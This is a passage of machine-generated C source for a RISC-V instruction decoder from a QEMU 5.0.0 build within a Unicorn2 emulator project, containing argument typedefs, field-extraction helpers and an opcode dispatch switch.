arg_fmsub_d; static bool trans_fmsub_d(DisasContext *ctx, arg_fmsub_d *a); typedef arg_decode_insn3210 arg_fnmsub_d; static bool trans_fnmsub_d(DisasContext *ctx, arg_fnmsub_d *a); typedef arg_decode_insn3210 arg_fnmadd_d; static bool trans_fnmadd_d(DisasContext *ctx, arg_fnmadd_d *a); typedef arg_decode_insn3211 arg_fadd_d; static bool trans_fadd_d(DisasContext *ctx, arg_fadd_d *a); typedef arg_decode_insn3211 arg_fsub_d; static bool trans_fsub_d(DisasContext *ctx, arg_fsub_d *a); typedef arg_decode_insn3211 arg_fmul_d; static bool trans_fmul_d(DisasContext *ctx, arg_fmul_d *a); typedef arg_decode_insn3211 arg_fdiv_d; static bool trans_fdiv_d(DisasContext *ctx, arg_fdiv_d *a); typedef arg_decode_insn3212 arg_fsqrt_d; static bool trans_fsqrt_d(DisasContext *ctx, arg_fsqrt_d *a); typedef arg_r arg_fsgnj_d; static bool trans_fsgnj_d(DisasContext *ctx, arg_fsgnj_d *a); typedef arg_r arg_fsgnjn_d; static bool trans_fsgnjn_d(DisasContext *ctx, arg_fsgnjn_d *a); typedef arg_r arg_fsgnjx_d; static bool trans_fsgnjx_d(DisasContext *ctx, arg_fsgnjx_d *a); typedef arg_r arg_fmin_d; static bool trans_fmin_d(DisasContext *ctx, arg_fmin_d *a); typedef arg_r arg_fmax_d; static bool trans_fmax_d(DisasContext *ctx, arg_fmax_d *a); typedef arg_decode_insn3212 arg_fcvt_s_d; static bool trans_fcvt_s_d(DisasContext *ctx, arg_fcvt_s_d *a); typedef arg_decode_insn3212 arg_fcvt_d_s; static bool trans_fcvt_d_s(DisasContext *ctx, arg_fcvt_d_s *a); typedef arg_r arg_feq_d; static bool trans_feq_d(DisasContext *ctx, arg_feq_d *a); typedef arg_r arg_flt_d; static bool trans_flt_d(DisasContext *ctx, arg_flt_d *a); typedef arg_r arg_fle_d; static bool trans_fle_d(DisasContext *ctx, arg_fle_d *a); typedef arg_decode_insn3213 arg_fclass_d; static bool trans_fclass_d(DisasContext *ctx, arg_fclass_d *a); typedef arg_decode_insn3212 arg_fcvt_w_d; static bool trans_fcvt_w_d(DisasContext *ctx, arg_fcvt_w_d *a); typedef arg_decode_insn3212 arg_fcvt_wu_d; static bool trans_fcvt_wu_d(DisasContext *ctx, arg_fcvt_wu_d *a); typedef arg_decode_insn3212 arg_fcvt_d_w; static bool trans_fcvt_d_w(DisasContext *ctx, arg_fcvt_d_w *a); typedef arg_decode_insn3212 arg_fcvt_d_wu; static bool trans_fcvt_d_wu(DisasContext *ctx, arg_fcvt_d_wu *a); static void decode_insn32_extract_atom_ld(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = 0; a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_atom_st(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_b(DisasContext *ctx, arg_b *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 8, 4), 4, 28, extract32(insn, 25, 6)), 10, 22, extract32(insn, 7, 1)), 11, 21, sextract32(insn, 31, 1))); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_csr(DisasContext *ctx, arg_decode_insn329 *a, uint32_t insn) { a->csr = extract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_decode_insn32_Fmt_18(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void decode_insn32_extract_decode_insn32_Fmt_19(DisasContext *ctx, arg_decode_insn3216 *a, uint32_t insn) { a->pred = extract32(insn, 24, 4); a->succ = extract32(insn, 20, 4); } static void decode_insn32_extract_hfence_bvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_hfence_gvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_i(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = sextract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_j(DisasContext *ctx, arg_j *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 21, 10), 10, 22, extract32(insn, 20, 1)), 11, 21, extract32(insn, 12, 8)), 19, 13, sextract32(insn, 31, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2(DisasContext *ctx, arg_decode_insn3213 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2_rm(DisasContext *ctx, arg_decode_insn3212 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r4_rm(DisasContext *ctx, arg_decode_insn3210 *a, uint32_t insn) { a->rs3 = extract32(insn, 27, 5); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r_rm(DisasContext *ctx, arg_decode_insn3211 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_s(DisasContext *ctx, arg_s *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 7, 5), 5, 27, sextract32(insn, 25, 7)); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vm(DisasContext *ctx, arg_decode_insn3215 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sh(DisasContext *ctx, arg_shift *a, uint32_t insn) { a->shamt = extract32(insn, 20, 10); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_u(DisasContext *ctx, arg_u *a, uint32_t insn) { a->imm = ex_shift_12(ctx, sextract32(insn, 12, 20)); a->rd = extract32(insn, 7, 5); } static bool decode_insn32(DisasContext *ctx, uint32_t insn) { union { arg_atomic f_atomic; arg_b f_b; arg_decode_insn3210 f_decode_insn3210; arg_decode_insn3211 f_decode_insn3211; arg_decode_insn3212 f_decode_insn3212; arg_decode_insn3213 f_decode_insn3213; arg_decode_insn3214 f_decode_insn3214; arg_decode_insn3215 f_decode_insn3215; arg_decode_insn3216 f_decode_insn3216; arg_decode_insn329 f_decode_insn329; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000007f) { case 0x00000003: /* ........ ........ ........ .0000011 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:96 */ if (trans_lb(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:97 */ if (trans_lh(ctx, &u.f_i)) return true; return false; case 0x2: /* ........ ........ .010.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:98 */ if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:99 */ if (trans_lbu(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:100 */ if (trans_lhu(ctx, &u.f_i)) return true; return false; } return false; case 0x00000007: /* ........ ........ ........ .0000111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:156 */ if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:184 */ if (trans_fld(ctx, &u.f_i)) return true; return false; } return false; case 0x0000000f: /* ........ ........ ........ .0001111 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:123 */ decode_insn32_extract_decode_insn32_Fmt_19(ctx, &u.f_decode_insn3216, insn); if (trans_fence(ctx, &u.f_decode_insn3216)) return true; return false; case 0x1: /* ........ ........ .001.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:124 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); if (trans_fence_i(ctx, &u.f_empty)) return true; return false; } return false; case 0x00000013: /* ........ ........ ........ .0010011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:104 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .001.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:110 */ if (trans_slli(ctx, &u.f_shift)) return true; return false; } return false; case 0x2: /* ........ ........ .010.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:105 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_slti(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:106 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_sltiu(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:107 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_xori(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:111 */ if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 01...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:112 */ if (trans_srai(ctx, &u.f_shift)) return true; return false; } return false; case 0x6: /* ........ ........ .110.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:108 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_ori(ctx, &u.f_i)) return true; return false; case 0x7: /* ........ ........ .111.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:109 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; } return false; case 0x00000017: /* ........ ........ ........ .0010111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:87 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_auipc(ctx, &u.f_u)) return true; return false; case 0x00000023: /* ........ ........ ........ .0100011 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:101 */ if (trans_sb(ctx, &u.f_s)) return true; return false; case 0x1: /* ........ ........ .001.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:102 */ if (trans_sh(ctx, &u.f_s)) return true; return false; case 0x2: /* ........ ........ .010.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:103 */ if (trans_sw(ctx, &u.f_s)) return true; return false; } return false; case 0x00000027: /* ........ ........ ........ .0100111 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:157 */ if (trans_fsw(ctx, &u.f_s)) return true; return false; case 0x3: /* ........ ........ .011.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:185 */ if (trans_fsd(ctx, &u.f_s)) return true; return false; } return false; case 0x0000002f: /* ........ ........ ........ .0101111 */ switch (insn & 0xf8007000) { case 0x00002000: /* 00000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:146 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoadd_w(ctx, &u.f_atomic)) return true; return false; case 0x08002000: /* 00001... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:145 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoswap_w(ctx, &u.f_atomic)) return true; return false; case 0x10002000: /* 00010... ........ .010.... .0101111 */ decode_insn32_extract_atom_ld(ctx, &u.f_atomic, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 00010..0 0000.... .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:143 */ if (trans_lr_w(ctx, &u.f_atomic)) return true; return false; } return false; case 0x18002000: /* 00011... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:144 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_sc_w(ctx, &u.f_atomic)) return true; return false; case 0x20002000: /* 00100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:147 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoxor_w(ctx, &u.f_atomic)) return true; return false; case 0x40002000: /* 01000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:149 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoor_w(ctx, &u.f_atomic)) return true; return false; case 0x60002000: /* 01100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:148 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoand_w(ctx, &u.f_atomic)) return true; return false; case 0x80002000: /* 10000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:150 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomin_w(ctx, &u.f_atomic)) return true; return false; case 0xa0002000: /* 10100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:151 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomax_w(ctx, &u.f_atomic)) return true; return false; case 0xc0002000: /* 11000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:152 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amominu_w(ctx, &u.f_atomic)) return true; return false; case 0xe0002000: /* 11100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:153 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomaxu_w(ctx, &u.f_atomic)) return true; return false; } return false; case 0x00000033: /* ........ ........ ........ .0110011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch (insn & 0xfe007000) { case 0x00000000: /* 0000000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:113 */ if (trans_add(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 0000000. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:115 */ if (trans_sll(ctx, &u.f_r)) return true; return false; case 0x00002000: /* 0000000. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:116 */ if (trans_slt(ctx, &u.f_r)) return true; return false; case 0x00003000: /* 0000000. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:117 */ if (trans_sltu(ctx, &u.f_r)) return true; return false; case 0x00004000: /* 0000000. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:118 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00005000: /* 0000000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:119 */ if (trans_srl(ctx, &u.f_r)) return true; return false; case 0x00006000: /* 0000000. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:121 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00007000: /* 0000000. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:122 */ if (trans_and(ctx, &u.f_r)) return true; return false; case 0x02000000: /* 0000001. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:133 */ if (trans_mul(ctx, &u.f_r)) return true; return false; case 0x02001000: /* 0000001. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:134 */ if (trans_mulh(ctx, &u.f_r)) return true; return false; case 0x02002000: /* 0000001. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:135 */ if (trans_mulhsu(ctx, &u.f_r)) return true; return false; case 0x02003000: /* 0000001. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:136 */ if (trans_mulhu(ctx, &u.f_r)) return true; return false; case 0x02004000: /* 0000001. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:137 */ if (trans_div(ctx, &u.f_r)) return true; return false; case 0x02005000: /* 0000001. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:138 */ if (trans_divu(ctx, &u.f_r)) return true; return false; case 0x02006000: /* 0000001. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:139 */ if (trans_rem(ctx, &u.f_r)) return true; return false; case 0x02007000: /* 0000001. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:140 */ if (trans_remu(ctx, &u.f_r)) return true; return false; case 0x40000000: /* 0100000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:114 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x40005000: /* 0100000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:120 */ if (trans_sra(ctx, &u.f_r)) return true; return false; } return false; case 0x00000037: /* ........ ........ ........ .0110111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:86 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x00000043: /* ........ ........ ........ .1000011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:158 */ if (trans_fmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:186 */ if (trans_fmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000047: /* ........ ........ ........ .1000111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:159 */ if (trans_fmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:187 */ if (trans_fmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004b: /* ........ ........ ........ .1001011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:160 */ if (trans_fnmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:188 */ if (trans_fnmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004f: /* ........ ........ ........ .1001111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:161 */ if (trans_fnmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:189 */ if (trans_fnmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000053: /* ........ ........ ........ .1010011 */ switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:162 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x1: /* 0000001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:190 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x4: /* 0000100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:163 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x5: /* 0000101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:191 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x8: /* 0001000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:164 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x9: /* 0001001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:192 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0xc: /* 0001100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:165 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0xd: /* 0001101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:193 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x10: /* 0010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:167 */ if (trans_fsgnj_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:168 */ if (trans_fsgnjn_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:169 */ if (trans_fsgnjx_s(ctx, &u.f_r)) return true; return false; } return false; case 0x11: /* 0010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:195 */ if (trans_fsgnj_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:196 */ if (trans_fsgnjn_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:197 */ if (trans_fsgnjx_d(ctx, &u.f_r)) return true; return false; } return false; case 0x14: /* 0010100. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010100. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:170 */ if (trans_fmin_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010100. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:171 */ if (trans_fmax_s(ctx, &u.f_r)) return true; return false; } return false; case 0x15: /* 0010101. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010101. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:198 */ if (trans_fmin_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010101. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:199 */ if (trans_fmax_d(ctx, &u.f_r)) return true; return false; } return false; case 0x20: /* 0100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x1: /* 01000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:200 */ if (trans_fcvt_s_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x21: /* 0100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:201 */ if (trans_fcvt_d_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2c: /* 0101100. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:166 */ if (trans_fsqrt_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2d: /* 0101101. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:194 */ if (trans_fsqrt_d(ctx, 